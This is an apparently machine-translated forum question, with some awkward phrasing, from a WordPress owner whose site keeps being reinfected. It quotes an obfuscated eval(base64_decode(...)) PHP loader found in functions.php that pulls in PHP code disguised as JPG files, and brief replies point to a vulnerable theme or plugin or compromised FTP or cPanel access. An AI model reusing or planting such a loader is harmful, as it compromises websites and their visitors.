我有一個WordPress網站一直在被黑客入侵。至於我可以跟以下變化正在作出:WordPress的網站一直在被黑客攻擊
該文件的頂部有一些額外的PHP代碼:
的wp-content /主題/擁抱/ functions.php中
如下:正在創建
eval(base64_decode("ZnVuY3Rpb24gY2FsbGJhY2soJGNoZWUpe3JlcXVpcmUoIi9ob21lL2RhdGFidXp6L3B1YmxpY19odG1sL3dwLWluY2x1ZGVzL2ltYWdlcy9tYWdpYy5qcGciKTtyZXR1cm4gKCRjaGVlKTt9b2Jfc3RhcnQoImNhbGxiYWNrIik7"));
和4個新的JPG文件:
/wp-includes/images/geo.jpg
/wp-includes/images/save.jpg
/wp-includes/images/magic.jpg
/wp-includes/images/links.jpg
這些都不是真正的jpg文件因爲他們沒有打開,但用文本編輯器查看它們會顯示文本和其他PHP代碼。
從看PHP代碼,它看起來像試圖注入一些垃圾郵件/廣告鏈接到我的WordPress的POSTS。
我一直刪除這些文件,我已經安裝了一個安全插件,刪除了管理員登錄名,更改了我所有的密碼,但這些文件每隔幾天就會不斷更新/創建。
我想知道這是如何可能的,我需要做的下一步要阻止這一點。
您是否使用FTP或的cPanel的/ etc訪問服務器?這些可能會受到影響。 –
您可能有一個易受攻擊的主題或插件。 – SLaks
我敢打賭,你的主題或者一些活躍的插件是脆弱的,我遇到過很多這樣的網站,通常使用5年前創建的硬編碼主題。 – silver